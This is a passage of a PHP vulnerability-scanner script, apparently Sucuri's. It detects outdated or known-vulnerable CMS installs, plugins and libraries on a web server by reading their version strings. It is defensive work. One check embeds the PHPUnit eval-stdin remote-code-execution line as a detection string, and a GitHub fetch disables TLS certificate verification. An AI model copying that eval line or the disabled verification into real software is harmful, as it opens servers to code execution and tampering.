    'otw_post_custom_templates_lite.php' => array('1.12', 'https://labs.sucuri.net/plugins-added-to-malware-campaign-july-2019/', 'Post Custom Templates Lite'),
    'wp-time-capsule.php' => array('1.21.16', 'https://wordpress.org/plugins/wp-time-capsule/', 'Backup and Staging by WP Time Capsule'),
    'popup-builder.php' => array('3.64.1', 'https://wordpress.org/plugins/popup-builder/', 'Popup Builder'),
    'brizy.php' => array('1.0.114', 'https://wpvulndb.com/vulnerabilities/10112', 'Brizy – Page Builder'),
    'flexible-checkout-fields.php' => array('2.3.4', 'https://www.wpdesk.net/blog/flexible-checkout-fields-vulnerability/', 'Flexible Checkout Fields for WooCommerce'),
    'rank-math.php' => array('1.0.41', 'https://wpvulndb.com/vulnerabilities/10157', 'WordPress SEO Plugin – Rank Math'),
    'elementor-pro.php' => array('2.9.4', 'https://wpvulndb.com/vulnerabilities/10214', 'Elementor Pro'),
    'ultimate-elementor.php' => array('1.24.2', 'https://wpvulndb.com/vulnerabilities/10215', 'Ultimate Elementor Pro'),
    'siteorigin-panels.php' => array('2.10.16', 'https://wpvulndb.com/vulnerabilities/10219', 'Page Builder by SiteOrigin'),
    'ninja-forms.php' => array('3.4.24.3', 'https://wpvulndb.com/vulnerabilities/10200', 'Ninja Forms'),
    'file_folder_manager.php' => array('6.9', 'https://wpvulndb.com/vulnerabilities/10389', 'File Manager'),
    'wp-customer-reviews-3.php' => array('3.4.3', 'https://wpvulndb.com/vulnerabilities/10363', 'WP Customer Reviews'),
    'woo-discount-rules.php' => array('2.1.0', 'https://wpvulndb.com/vulnerabilities/10364', 'Discount Rules for WooCommerce'),
);

// This line is updated with the most recent versions in refresh-versions.php on every build
$VERSIONS = array('signature'=>'sucuri-current-versions','joomla'=>array('3.9.21',),'wordpress'=>array('5.5.1',),'drupal'=>array('7.7.2','8.8.8','8.9.1','9.0.1',),'magento'=>array('1.9.4.5','2.3.5',),'jce'=>array('2.8.17',),'phpbb'=>array('3.3.1',),'vbulletin'=>array('5.6.1',),'jetpack'=>array('8.9',),'zenphoto'=>array('1.5.7',),'prestashop'=>array('1.7.6.7',),'opencart'=>array('3.0.3.6',),'oscommerce'=>array('2.3.4.1',),'timthumb'=>array('2.8.13',),'modX'=>array('evolution'=>'1.4.11','revolution'=>'2.7.3',),'typo3'=>array('9.5.20','10.4.6',),'Newsmag'=>array('3',),'Newspaper'=>array('6.7.2',),'jQueryFileUpload'=>array('9.25.1',),);

$isNoise = false;
if (isset($_GET['noise'])) {
    $isNoise = true;
}

// =======================
// checkIsUpdated

function checkIsUpdated($version, $latestVersions)
{
    $version = standardizeVersion($version);

    if (is_array($latestVersions)) {
        $lv = $latestVersions[0];
    } else {
        $lv = $latestVersions;
    }

    $checkArrayCount = is_array($latestVersions) ? count($latestVersions) : 0;

    $latest = 1 < $checkArrayCount
        ? findMostSimilar($version, $latestVersions)
        : standardizeVersion($lv);

    return version_compare($version, $latest) >= 0;
}

// finds the most similar version using XOR bitwise operation
// (same chars at the beginning of the string result in lower values of the result,
// lowest result gives the most similar from the beginning)
function findMostSimilar($version, $versions)
{
    $mostSimilar = false;
    $mostSimilarValue = 0;

    foreach ($versions as $currentVersion) {
        $endResult = standardizeVersion($currentVersion);
        $endResult = str_pad($endResult, strlen($version), '0');
        $endResult = unpack('H*', $version ^ $endResult);
        $endResult = base_convert($endResult[1], 16, 10);

        if (!$mostSimilar || $endResult < $mostSimilarValue) {
            $mostSimilar = $currentVersion;
            $mostSimilarValue = $endResult;
        }
    }

    return $mostSimilar;
}

function standardizeVersion($version)
{
    $version = preg_replace('/ Patch Level (\d+)/i', 'pl$1', $version);

    return $version;
}

// ============================================
// checkPlugin

function checkWpPlugin($path, $fileName)
{
    global $VULNERABLE_PLUGINS;

    list($safeVersion, $url, $pluginName) = $VULNERABLE_PLUGINS[$fileName];

    $pluginVersion = getWpPluginVersion("$path/$fileName");

    if ($pluginVersion && !checkIsUpdated($pluginVersion, $safeVersion)) {
        $info = array('name' => $pluginName, 'version' => $pluginVersion, 'dir' => $path.'/'.$fileName,
            'oldplugin' => true, );

        if ($url) {
            $info['url'] = $url;
        }

        return $info;
    }

    return false;
}

function getWpPluginVersion($file)
{
    $version = findLineInFile($file, 'Version:');

    $version = explode(':', $version);

    if (isset($version[1])) {
        return trim($version[1]);
    }

    return false;
}

// ============================================
// checkVersionInFile and friends

function checkWordPressAndZenPhotoVersion($fileName, $path)
{
    global $VERSIONS, $CMS;

    if (strpos($path, 'administrator/components/com_jevents') !== false ||
        strpos($path, 'tiny-compress-images/test/wp-includes') !== false) {
        return false;
    }

    $version = findLineInFile($path.'/'.$fileName, 'wp_version = ');
    if ($version !== null) {
        // WordPress
        $realdir = dirname($path);

        $explosion = explode("'", $version);

        if (isset($explosion[1])) {
            $version = $explosion[1];
        }

        $CMS = '1';

        return array('name' => 'WordPress', 'version' => $version, 'dir' => $realdir,
            'updated' => checkIsUpdated($version, $VERSIONS['wordpress']),
            'config' => $realdir.'/wp-config.php', 'source' => $path . '/' . $fileName, );
    }

    // Zen Photo
    $version = findLineInFile($path.'/'.$fileName, 'ZENPHOTO_VERSION');
    if ($version == null) {
        return false;
    }

    $version = trim($version);
    $version = explode("'", $version);
    $version = $version[3];

    return array('name' => 'Zenphoto', 'version' => $version, 'dir' => $path.'/'.$fileName,
        'updated' => checkIsUpdated($version, $VERSIONS['zenphoto']), );
}

function checkJoomlaVersion($fileName, $path)
{
    global $VERSIONS, $CMS;

    $versionFile = '';
    if (file_exists("$path/includes/version.php")) {
        $versionFile = "$path/includes/version.php";
    } elseif (file_exists("$path/libraries/joomla/version.php")) {
        $versionFile = "$path/libraries/joomla/version.php";
    } elseif (file_exists("$path/libraries/cms/version.php")) {
        $versionFile = "$path/libraries/cms/version.php";
    } elseif (file_exists("$path/libraries/cms/version/version.php") && false === strpos($path, 'breezing-forms')) {
        $versionFile = "$path/libraries/cms/version/version.php";
    } elseif (file_exists("$path/libraries/src/Version.php")) {
        $versionFile = "$path/libraries/src/Version.php";
    } else {
        return false;
    }

    $version1 = findLineInFile($versionFile, 'RELEASE');
    if (!$version1) {
        return false;
    }

    $version1 = explode("'", $version1);
    $version2 = findLineInFile($versionFile, 'DEV_LEVEL');
    $version2 = explode("'", $version2);
    $version = $version1[1].'.'.$version2[1];

    $CMS = '1';

    return array('name' => 'Joomla', 'version' => $version, 'dir' => $path, 'source' => $versionFile,
        'updated' => checkIsUpdated($version, $VERSIONS['joomla']),
        'config' => $path.'/'.$fileName, );
}

function checkJceVersion($fileName, $path)
{
    global $VERSIONS;

    $firstLine = findLineInFile($path.'/'.$fileName, 'install');

    if (false === strpos($firstLine, 'component')) {
        return false;
    }

    $version = findLineInFile($path.'/'.$fileName, '<version>');
    $version = str_replace('<version>', '', $version);
    $version = str_replace('</version>', '', $version);
    $version = trim($version);
    $realdir = dirname($path);

    return array('name' => 'JCE component', 'version' => $version, 'dir' => $realdir,
        'updated' => checkIsUpdated($version, $VERSIONS['jce']), );
}

function checkjQueryFileUploadVersion($fileName, $path)
{
    /** Bring file to a string. */
    $fileContent = @file_get_contents("$path/$fileName");

    /** Exit in case the file does not contain the GitHub Address (not jQFU). */
    if (
        (empty($fileContent)) ||
        (false === strpos($fileContent, 'https://github.com/blueimp/jQuery-File-Upload'))
    ) {
        return false;
    }

    /**
     * Get current file hash, its version if possible and directory.
     * Set by default isUpdated to false until further check.
     */
    $fileHash = md5($fileContent);
    $version = findLineInFile($path.'/'.$fileName, '* jQuery File Upload Plugin');
    $version = trim($version);
    $version = preg_replace('@\*[\s]*jQuery File Upload Plugin[\s]*([\d\s]+)@', '$1', $version);
    if (preg_match('/[0-9]/', $version) === 0) {
        $version = 'Unknown.';
    }
    $realdir = dirname($path);
    $isUpdated = false;

    /**
     * Set isUpdated to true if the file has "IMAGETYPE_PNG" constant cause that
     * proves the file version has the known vulnerabilities patched.
     * @see https://github.com/blueimp/jQuery-File-Upload/blob/master/VULNERABILITIES.md
     * 
     * Otherwise, check if md5 hash matches the last version.
     */
    if (strpos($fileContent, 'IMAGETYPE_PNG') !== false) {
        $isUpdated = true;
    } else {
        /** Check the md5 hash of the last jQuery File Upload "UploadHandler.php". */
        $mostRecentUploadHandler = 'https://raw.githubusercontent.com/blueimp/jQuery-File-Upload/master/server/php/UploadHandler.php';
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $mostRecentUploadHandler);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, '20');
        curl_setopt($ch, CURLOPT_MAXREDIRS, '3');
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, '30');
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Sucuri Version Check '.$myversion);
        $mostRecentUploadHandlerContent = curl_exec($ch);
        curl_close($ch);

        /** Extract the md5 hash. */
        if (strpos($mostRecentUploadHandlerContent, 'jQuery-File-Upload') !== false) {
            $mostRecentUploadHandlerHash = md5($mostRecentUploadHandlerContent);
        } else {
            /** Set to true cause we were unable to verify the last version hash. */
            $isUpdated = true;
        }
    }

    /**
     * Set version to 9.25.1+ if file contains the "IMAGETYPE_PNG" constant
     * or to "Last available at GitHub" if md5 hash matches the latest commit.
     */
    if (empty($mostRecentUploadHandlerHash)) {
        if ($isUpdated) {
            $version = '9.25+';
        }
    } else {
        if ($fileHash === $mostRecentUploadHandlerHash) {
            $isUpdated = true;
            $version = 'Last available at GitHub.';
        }
    }

    /** Send result to main runtime. */
    return array(
        'name' => 'jQuery File Upload plugin',
        'version' => $version.' ',
        'dir' => $realdir,
        'updated' => $isUpdated,
    );
}

function checkDrupalVersion($fileName, $path)
{
    global $VERSIONS, $CMS;

    $version = findLineInFile($path.'/'.$fileName, "define('VERSION'");

    if (!$version) {
        return false;
    }

    $version = trim($version);
    $version = preg_replace("@^define\(\s*['\"]VERSION['\"]\s*,\s*['\"]([\d\.]+)['\"]\s*\);$@", '$1', $version);
    if ($fileName == 'bootstrap.inc') {
        $realdir = dirname($path);
    } else {
        $realdir = dirname(dirname($path));
    }

    $CMS = '1';

    return array('name' => 'Drupal', 'version' => $version, 'dir' => $realdir, 'source' => $path.'/'.$fileName,
        'updated' => checkIsUpdated($version, $VERSIONS['drupal']), );
}

function checkDrupal8Version($fileName, $path)
{
    global $VERSIONS, $CMS;
    
    $version = findLineInFile($path . '/' . $fileName, "const VERSION = '");

    if (!$version) {
        return false;
    }

    $version = trim($version);
    $version = preg_replace("@^const.VERSION.\=\s*\s*['\"]([\d\.]+)['\"]\s*;$@", '$1', $version);
    $realdir = dirname(dirname($path));

    $CMS = '1';
    return array('name' => 'Drupal', 'version' => $version, 'dir' => $realdir, 'source' => $path . '/' . $fileName,
        'updated' => checkIsUpdated($version, $VERSIONS['drupal']) );
}

function checkMagentoVersion($fileName, $path)
{
    global $VERSIONS, $CMS;

    $config = @file_get_contents("$path/$fileName");

    if ((false === $config) || (false === strpos($config, 'public static function getVersionInfo()'))) {
        return false;
    }

    $version = sprintf(
        '%s.%s.%s.%s',
        getOption('major', $config, OPT_TYPE_ASSOC),
        getOption('minor', $config, OPT_TYPE_ASSOC),
        getOption('revision', $config, OPT_TYPE_ASSOC),
        getOption('patch', $config, OPT_TYPE_ASSOC)
    );
    $realdir = dirname($path);

    $CMS = '1';

    return array('name' => 'Magento', 'version' => $version, 'dir' => $realdir, 'source' => $path.'/'.$fileName,
        'updated' => checkIsUpdated($version, $VERSIONS['magento']), );
}

//Magento 2 check
function checkMagento2Version($fileName, $path)
{
    global $VERSIONS, $CMS;
    if (strpos($path, 'dev/tests/integration/framework/Magento/TestFramework/Event') != false) {
        $originpath = $path;
        $path = str_replace('dev/tests/integration/framework/Magento/TestFramework/Event', '', $path);
        if (strpos($path, 'vendor/magento/magento2-base') != false) {
            if (file_exists($path.'composer.json')) {
                $fileName = 'composer.json';
                $config = file_get_contents($path.$fileName);
                preg_match('((?:\"version\"\: \"[0-9]+,)*[0-9]+(?:\.[0-9]+)(?:\.[0-9]+)":?)', $config, $version);
                $version = $version['0'];
                $version = str_replace('"', '', $version);
                $path = str_replace('vendor/magento', '', $path);
                $realdir = dirname($path);

                $CMS = '1';

                return array('name' => 'Magento 2', 'version' => $version, 'dir' => $realdir, 'source' => $originpath.'/'.$fileName,
                'updated' => checkIsUpdated($version, $VERSIONS['magento']), );
            }
        } else {
            return;
        }
    }
}

function checkModXVersion($fileName, $path)
{
    global $VERSIONS, $CMS;

    $config = @file_get_contents("$path/$fileName");
    if ($config === false) {
        return false;
    }

    $version = getOption('$modx_version', $config, OPT_TYPE_VAR);
    if ($version) {
        return array('name' => 'ModX Evolution', 'version' => $version, 'dir' => $path.'/'.$fileName,
            'updated' => checkIsUpdated($version, $VERSIONS['modX']['evolution']), );
    }

    if (!preg_match_all('@\$v\[\'([\S]+)\'\]\s*=\s*[\'](.*)[\'];@', $config, $m)) {
        return false;
    }
    if (!isset($m[2][0], $m[2][1], $m[2][2], $m[2][3])) {
        return false;
    }

    $realdir = dirname($path);
    if (substr($realdir, -5) == '/core') {
        $realdir = substr_replace($realdir, '', -5);
    }

    $CMS = '1';
    $version = sprintf('%s.%s.%s-%s', $m[2][0], $m[2][1], $m[2][2], $m[2][3]);

    return array('name' => 'ModX Revolution', 'version' => $version, 'dir' => $realdir, 'source' => $path.'/'.$fileName,
        'updated' => checkIsUpdated($version, $VERSIONS['modX']['revolution']), );
}

function checkPhpBbVersion($fileName, $path)
{
    global $VERSIONS, $CMS;

    if (!preg_match('~@?define\(.PHPBB_VERSION., +.(\S+).\);~', findLineInFile($path.'/'.$fileName, "'PHPBB_VERSION'"), $matches)) {
        return false;
    }
    $version = $matches[1];
    $realdir = dirname($path);

    $CMS = '1';

    return array('name' => 'PHPBB', 'version' => $version, 'dir' => $realdir,
        'updated' => checkIsUpdated($version, $VERSIONS['phpbb']), );
}

function checkVbulletinVersion($fileName, $path)
{
    global $VERSIONS, $CMS;

    $version = findLineInFile($path.'/'.$fileName, "'vbulletin'");

    if (!$version) {
        return false;
    }

    $version = str_replace("\t\t\$md5_sum_versions = array('vbulletin' => '", '', $version);
    $version = str_replace("');", '', $version);
    $realdir = dirname($path);

    $CMS = '1';

    return array('name' => 'vBulletin', 'version' => $version, 'dir' => $realdir, 'source' => $path.'/'.$fileName,
        'updated' => checkIsUpdated($version, $VERSIONS['vbulletin']), );
}

function checkOsCommerceVersion($fileName, $path)
{
    global $VERSIONS, $CMS;
    $verRegex = '[0-9.]+[ -]?[0-9a-zA-Z]{0,5}'; // Examples: "2.3.1"   "2.3.3.2"   "2.2-MS2"  "2.2 RC2a"  "2.2RC2a"

    $realdir = dirname($path);

    // See https://github.com/osCommerce/oscommerce2/commits/23/catalog/includes/version.php
    $versionFileNames = array("$path/includes/version.php", "$path/includes/version.txt",
        "$path/includes/OSC/version.txt", );

    $version = false;

    foreach ($versionFileNames as $fileName) {
        $config = @file_get_contents($fileName);
        if ($config && preg_match('/^'.$verRegex.'$/', $config)) {
            $version = $config;
            $versionFile = $fileName;
            break;
        }
    }

    if (!$version) {
        $versionFile = "$path/includes/application_top.php";
        $config = @file_get_contents($versionFile);
        $option = getOption('PROJECT_VERSION', $config, OPT_TYPE_CONST);
        // PROJECT_VERSION can be something like "osCommerce 2.2-MS2" or "osCommerce Online Merchant v2.2 RC1"
        if (preg_match('/('.$verRegex.')$/', $option, $m)) {
            $version = $m[1];
        }
    }

    if (!$version) {
        return false;
    }

    $CMS = '1';

    return array('name' => 'osCommerce', 'version' => $version, 'dir' => $realdir, 'source' => $versionFile,
        'updated' => checkIsUpdated($version, $VERSIONS['oscommerce']), );
}

function checkPrestaShopVersion($fileName, $path)
{
    global $VERSIONS, $CMS;

    $realdir = dirname($path);

    $version = null;

    if (file_exists("$realdir/config/autoload.php")) {
        $versionFile = "$realdir/config/autoload.php";
        $config = @file_get_contents($versionFile);
        $version = getOption('_PS_VERSION_', $config, OPT_TYPE_CONST);
    }

    if (!$version && file_exists("$realdir/docs/readme_en.txt")) {
        $versionFile = "$realdir/docs/readme_en.txt";
        $line = findLineInFile($versionFile, 'NAME: Prestashop ');
        $version = str_replace(array("\r", "\n", 'NAME: Prestashop '), '', $line);
    }

    if (!$version) {
        return false;
    }

    $CMS = '1';

    return array('name' => 'PrestaShop', 'version' => $version, 'dir' => $realdir, 'source' => $versionFile,
        'updated' => checkIsUpdated($version, $VERSIONS['prestashop']), );
}

function checkOpenCartVersion($fileName, $path)
{
    global $VERSIONS, $CMS;

    if (false === strpos($path, 'admin/controller/catalog')) {
        return false;
    }

    $realdir = dirname(dirname(dirname($path)));

    if (!file_exists("$realdir/admin/index.php")) {
        return false;
    }

    $config = @file_get_contents("$realdir/admin/index.php");
    $version = getOption('VERSION', $config, OPT_TYPE_CONST);

    if (!$version) {
        return false;
    }

    $CMS = '1';

    return array('name' => 'OpenCart', 'version' => $version, 'dir' => $realdir,
        'updated' => checkIsUpdated($version, $VERSIONS['opencart']), );
}

function checkTypo3Version($fileName, $path)
{
    global $VERSIONS;

    $realdir = $fileName === 'config_default.php' ? dirname($path) : dirname(dirname(dirname(dirname($path))));

    $config = @file_get_contents($path.'/'.$fileName);

    $version = getOption('TYPO3_version', $config, OPT_TYPE_CONST);
    if (!$version && $fileName === 'config_default.php') {
        // Before 4.8
        $version = getOption('$TYPO_VERSION', $config, OPT_TYPE_VAR);
    }

    if (!$version) {
        return false;
    }

    return array('name' => 'Typo3', 'version' => $version, 'dir' => $realdir, 'source' => $fileName,
        'updated' => checkIsUpdated($version, $VERSIONS['typo3']), );
}
function checkTDThemesVersion($fileName, $path)
{
    global $VERSIONS;

    $version = findLineInFile($path.'/'.$fileName, 'define("TD_THEME_VERSION", ');

    if (!$version) {
        return false;
    }

    $version = trim($version);
    $version = preg_replace("@define\(\"TD_THEME_VERSION\", \"(\S+)\"\);@", '$1', $version);
    $themename = findLineInFile($path.'/'.$fileName, 'define("TD_THEME_NAME", ');
    $themename = trim(preg_replace("@define\(\"TD_THEME_NAME\", \"(\S+)\"\);@", '$1', $themename));
    if (!$themename) {
        return false;
    }

    return array('name' => 'tagDiv Theme '.$themename, 'version' => $version, 'dir' => $path.'/'.$fileName, 'updated' => checkIsUpdated($version, $VERSIONS[$themename]));
}

function checkTimThumbVersion($fileName, $path)
{
    global $VERSIONS;

    /* Check for timthumb version */
    if (!findLineInFile($path.'/'.$fileName, 'TimThumb')) {
        return false;
    }

    $version = findLineInFile($path.'/'.$fileName, "'VERSION'");
    $rversion = explode("'", $version);

    if (!isset($rversion[3])) {
        return false;
    }

    return array('name' => 'TimThumb', 'version' => $rversion[3], 'dir' => $path.'/'.$fileName,
        'updated' => checkIsUpdated($rversion[3], $VERSIONS['timthumb']), );
}

function checkRevSliderVersion($fileName, $path)
{
    $config = @file_get_contents("$path/$fileName");
    if (false === $config) {
        return false;
    }

    $version = getOption('$revSliderVersion', $config, OPT_TYPE_VAR);
    if (!$version) {
        return false;
    }

    if (version_compare($version, '4.1.5') < 0) {
        return array('name' => 'Slider Revolution', 'version' => $version, 'dir' => $path.'/'.$fileName,
            'oldplugin' => true, 'url' => 'https://www.themepunch.com/faq/how-to-update-the-slider/', );
    }

    return false;
}

function checkShowBizVersion($fileName, $path)
{
    $config = @file_get_contents("$path/$fileName");
    if (false === $config) {
        return false;
    }

    $version = getOption('$showbizVersion', $config, OPT_TYPE_VAR);
    if (!$version) {
        return false;
    }

    if (version_compare($version, '1.7.2') < 0) {
        return array('name' => 'ShowBiz Plugin', 'version' => $version, 'dir' => $path.'/'.$fileName,
            'oldplugin' => true, );
    }

    return false;
}

function checkDzsVideoGalleryVersion($fileName, $path)
{
    if (false === strpos($path, '/wp-content/plugins/dzs-videogallery/')) {
        return false;
    }

    $version = findLineInFile($path.'/'.$fileName, 'DZS Upload');

    if (strpos($version, 'version: 0.') !== false || strpos($version, 'version: 1.0') !== false) {
        return array('name' => 'dzs-videogallery', 'version' => $version, 'dir' => $path.'/'.$fileName,
            'oldplugin' => true, );
    }

    return false;
}

function checkFreemiusVersion($fileName, $path)
{

    if (false === strpos($path, '/freemius')) {
        return false;
    }

    $version = findLineInFile($path.'/'.$fileName, '$this_sdk_version =');
    $patterns[0] = '/\$this_sdk_version = \'/';
    $patterns[1] = '/\';/';
    $replacement = '';
    $version = trim(preg_replace($patterns, $replacement, $version));

    if (version_compare($version, '2.2.3') <= 0) {
        return array('name' => 'Freemius Library', 'version' => $version, 'dir' => $path.'/'.$fileName, 'oldplugin' => true, 'url' => 'https://wpvulndb.com/vulnerabilities/9223', );
    }

    return false;
}

function checkPhpMailerVersion($fileName, $path)
{

    //confirming we're having right class
    if (!findLineInFile($path.'/'.$fileName, 'https://github.com/PHPMailer/')) {
        return false;
    }

    //extracting only the version string
    $version = findLineInFile($path.'/'.$fileName, "Version:");
    if (preg_match("/\d\.\d\.\d/", $version, $matches)) {
        $version = $matches[0];
    }
    else {
        return false;
    }

    // Compares if plugin version is 6.0.5 or lower (first safe version is 6.0.6)
    if (version_compare($version, '6.0.5') <= 0) {
        return array('name' => 'PHPMailer Class', 'version' => $version, 'dir' => $path.'/'.$fileName,
            'oldplugin' => true, 'url' => 'https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md', );
    }

    return false;
}

function checkPluginIndexVersion($fileName, $path)
{
    // if there will be more cases of plugins using index.php as version file, we'll need to add new array of pairs
    // such as "/hybrid-composer" => "1.4.6"
    // and rework this whole function into using this new array

    if (false !== strpos($path, '/hybrid-composer')) {
        //getting the line with version number
        $version = findLineInFile($path.'/'.$fileName, '* Version:');

        // keeping just the version value
        $version = trim(preg_replace("/\* Version: /", '$1', $version));

        // Compares if plugin version is 1.4.6 or lower
        if (version_compare($version, '1.4.6') <= 0) {
            return array('name' => 'WPTF Hybrid Composer', 'version' => $version, 'dir' => $path.'/'.$fileName,
                'oldplugin' => true, 'url' => 'https://labs.sucuri.net/wptf-hybrid-composer-unauthenticated-arbitrary-options-update/', );
        }
    }

    // another else if could be added for other plugins with index.php as plugin version file
    // if there will be too many such plugins, this structure can be reworked into another array

    return false;
}

// The plugin is using the filename "Main.php" which is very generic.
// With that, we created a function to detect and alert for such cases.
    
function checkPluginMainVersion($fileName, $path)
{
    if (false !== strpos($path, '/ultimate-faqs')) {
        //getting the line with version number
        $version = findLineInFile($path.'/'.$fileName, 'Version: ');

        // keeping just the version value
        $version = trim(preg_replace("/Version: /", '$1', $version));

        // Compares if plugin version is 1.8.21 or lower
        if (version_compare($version, '1.8.21') <= 0) {
            return array('name' => 'Ultimate FAQ', 'version' => $version, 'dir' => $path.'/'.$fileName,
            'oldplugin' => true, 'url' => 'https://labs.sucuri.net/malware-campaign-evolves-to-target-new-plugins-may-2019/', );
        }
    }

    // another else if could be added for other plugins with Main.php as plugin version file
    // if there will be too many such plugins, this structure can be reworked into another array

    return false;

}

function checkPluginInitVersion($fileName, $path)
{
    // if there will be more cases of plugins using index.php as version file, we'll need to add new array of pairs
    // such as "/hybrid-composer" => "1.4.6"
    // and rework this whole function into using this new array

    //workaround to ensure we're checking init.php in the plugin root
    if (false !== strpos($path.$fileName, '/ithemes-syncinit.php')) {
        //getting the line with version number
        $version = findLineInFile($path.'/'.$fileName, 'Version:');

        // keeping just the version value
        $version = trim(preg_replace("/Version: /", '$1', $version));

        // Compares if plugin version is 1.4.6 or lower
        if (version_compare($version, '2.0.17') <= 0) {
            return array('name' => 'iThemes Sync', 'version' => $version, 'dir' => $path.'/'.$fileName,
                'oldplugin' => true, 'url' => 'https://ithemes.com/important-ithemes-sync-vulnerability-patched/', );
        }
    }

    // Added support to InfiniteWP Client since it uses init.php as the initializer for the plugin
    if (false !== strpos($path.$fileName, '/iwp-client')) {
        //getting the line with version number
        $version = findLineInFile($path.'/'.$fileName, 'Version:');

        // keeping just the version value
        $version = trim(preg_replace("/Version: /", '$1', $version));

        // Compares if plugin version is 1.9.4.4 or lower
        if (version_compare($version, '1.9.4.4') <= 0) {
            return array('name' => 'InfiniteWP Client', 'version' => $version, 'dir' => $path.'/'.$fileName,
                'oldplugin' => true, 'url' => 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html', );
        }
    }

    // another else if could be added for other plugins with index.php as plugin version file
    // if there will be too many such plugins, this structure can be reworked into another array

    return false;
}

function checkThemeStyleVersion($fileName, $path)
{
    // if there will be more cases of themes using style.css as version file, we'll need to add new array of pairs
    // such as "/onetone/" => "3.0.6"
    // and rework this whole function into using this new array

    if (false !== strpos($path . '/' . $fileName, '/onetone/')) {
        //getting the line with version number
        $version = findLineInFile($path . '/' . $fileName, 'Version:');

        // keeping just the version value
        $version = trim(preg_replace("/Version: /", '$1', $version));

        // Compares if plugin version is 3.0.6 or lower
        if (version_compare($version, '3.0.6') <= 0) {
            return array('name' => 'OneTone Theme', 'version' => $version, 'dir' => $path.'/', 'updated' => false, 'url' => 'https://wpvulndb.com/themes/onetone', );
        }
    }

    return false;
}


function checkUploadifyVersion($fileName, $path)
{
    return array('name' => 'uploadify');
}

function checkPHPUnitVersion($fileName, $path)
{
    if (false === strpos($path . '/' . $fileName, '/Util/PHP/eval-stdin.php')) {
        return false;
    }
    
    // Check that the file contains the vulnerable code (reading from php://input)
    $contents = @file_get_contents($path . '/' . $fileName, false, null, 0, 1024);
    
    if (strpos($contents, "eval('?>' . file_get_contents('php://input'));") === false) {
        return false; // not vulnerable
    }
    
    // Find the PHPUnit version
    $realdir = dirname(dirname($path));
    
    $version = findLineInFile($realdir . '/Runner/Version.php', 'SebastianBergmann\\Version');
    
    if ($version !== null && preg_match("/SebastianBergmann\\\\Version\\('([0-9.]+)',/", $version, $m)) {   
        $version = $m[1];
    } else {
        $version = findLineInFile($realdir . '/Runner/Version.php', "const VERSION = '");
        if ($version !== null && preg_match("/const VERSION = '([0-9.]+)'/", $version, $m)) {
            $version = $m[1];
        } else {
            $version = 'unknown';
        }
    }

    return array('name' => 'phpunit', 'version' => $version, 'dir' => $path.'/', 'updated' => false);
}

function checkElementorVersion($fileName, $path)
{
    if (false === strpos($path . '/' . $fileName, 'plugins/elementor/elementor.php')) {
        return false;
    }
    
    $version = findLineInFile($path . '/' . $fileName, '* Version:');
    $version = trim(preg_replace("/ \* Version: /", '$1', $version));
    
    if (version_compare($version, '2.9.7') <= 0) {
        return array('name' => 'Elementor', 'version' => $version, 'dir' => $path.'/', 'updated' => false, 'url' => 'https://wpvulndb.com/vulnerabilities/10213', );
    }
}


function checkHtaccess($fileName, $path)
{
    return array('name' => 'htaccess');
}

// ==================================
// The main version check loop

$VERSION_CHECKS = array(
    'system.module' => 'checkDrupalVersion',
    'bootstrap.inc' => 'checkDrupalVersion',
    'Drupal.php' => 'checkDrupal8Version',
    'Mage.php' => 'checkMagentoVersion',
    'Magento.php' => 'checkMagento2Version',
    'version.inc.php' => 'checkModXVersion',
    'configuration.php' => 'checkJoomlaVersion',
    'jce.xml' => 'checkJceVersion',
    'constants.php' => 'checkPhpBbVersion',
    'diagnostic.php' => 'checkVBulletinVersion',
    'version.php' => 'checkWordPressAndZenPhotoVersion',
    'checkout_shipping_address.php' => 'checkOsCommerceVersion',
    'revslider.php' => 'checkRevSliderVersion',
    'showbiz.php' => 'checkShowBizVersion',
    'TranslatedConfiguration.php' => 'checkPrestaShopVersion',
    'manufacturer.php' => 'checkOpenCartVersion',
    'upload.php' => 'checkDzsVideoGalleryVersion',
    'uploadify.php' => 'checkUploadifyVersion',
    '.htaccess' => 'checkHtaccess',
    'config_default.php' => 'checkTypo3Version',
    'SystemEnvironmentBuilder.php' => 'checkTypo3Version',
    'td_config.php' => 'checkTDThemesVersion',
    'UploadHandler.php' => 'checkjQueryFileUploadVersion',
    'index.php' => 'checkPluginIndexVersion',
    'Main.php' => 'checkPluginMainVersion',
    'start.php' => 'checkFreemiusVersion',
    'init.php' => 'checkPluginInitVersion',
    'phpmailer.php' => 'checkPhpMailerVersion',
    'style.css' => 'checkThemeStyleVersion',
    'eval-stdin.php' => 'checkPHPUnitVersion',
    'elementor.php' => 'checkElementorVersion',
);

function runVersionCheck($path, $checkFound)
{
    global $VULNERABLE_PLUGINS, $VERSION_CHECKS, $isNoise, $CMS;

    $dh = @opendir($path);
    if (!$dh) {
        if ($isNoise) {
            echo 'Open directory failed: '.escapeHtml($path)."\n";
        }

        return;
    }
	
    call_user_func($checkFound, $path, 'trace');

    while (($fileName = @readdir($dh)) !== false) {
        if ($fileName === '.' || $fileName == '..' || strpos($fileName, 'sucuribackup.') !== false) {
            continue;
        }

        $fullName = $path.'/'.$fileName;
        if (@is_link($fullName)) {
            if ($isNoise) {
                echo 'Skipping symlink directory: '.escapeHtml($fullName)."\n";
            }
            continue;
        }

        $res = false;
        if (isset($VERSION_CHECKS[$fileName])) {
            $CMS = '0';
            $res = call_user_func($VERSION_CHECKS[$fileName], $fileName, $path);
        } elseif (strpos($fileName, '.php') !== false &&
            (strpos($fileName, 'thumb') !== false ||
            strpos($fileName, 'Thumb') !== false ||
            strpos($fileName, 'crop') !== false)) {
            $res = checkTimThumbVersion($fileName, $path);
            $CMS = '0';
        } elseif (false !== strpos($path, '/wp-content/plugins/') && isset($VULNERABLE_PLUGINS[$fileName])) {
            $CMS = '0';
            $res = checkWpPlugin($path, $fileName);
        }
        if ($res) {
            call_user_func($checkFound, $fullName, $res);
        }

        if (@is_dir($fullName)) {
            if ($isNoise) {
                echo '    Reading Dir: '.escapeHtml($fullName)."\n";
            }
            runVersionCheck($fullName, $checkFound);
            @flush();
        }
    }
    closedir($dh);
}


